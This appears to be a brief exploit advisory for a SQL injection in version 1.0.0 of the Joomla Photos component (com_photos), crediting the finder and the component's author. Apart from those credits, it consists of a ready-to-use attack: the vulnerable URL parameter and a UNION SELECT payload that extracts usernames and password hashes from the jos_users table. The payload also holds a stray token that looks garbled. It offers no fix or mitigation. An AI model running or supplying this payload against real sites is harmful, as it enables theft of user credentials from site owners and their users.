The Joomla Photos component version 1.0.0 suffers from a remote SQL injection vulnerability.
f0ae2bdef86e0ba7fc130b98c6c8ac91c455d1a74f35d96488ea9eed50b2193e
#############################################################################
# #
# Joomla Component com_photos SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Photos (com_photos)"
[~] Version: "1.0.0"
[~] Author: "Newgekko"
[~] Author E-mail: "webmaster@rire.org"
[~] Author URL: "www.newgekko.com"
########################################
[~] Exploit: /index.php?option=com_photos&act=view&Itemid=34&id=[SQL]
[~] Example: /index.php?option=com_photos&act=view&Itemid=34&id=-1835+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users/*
########################################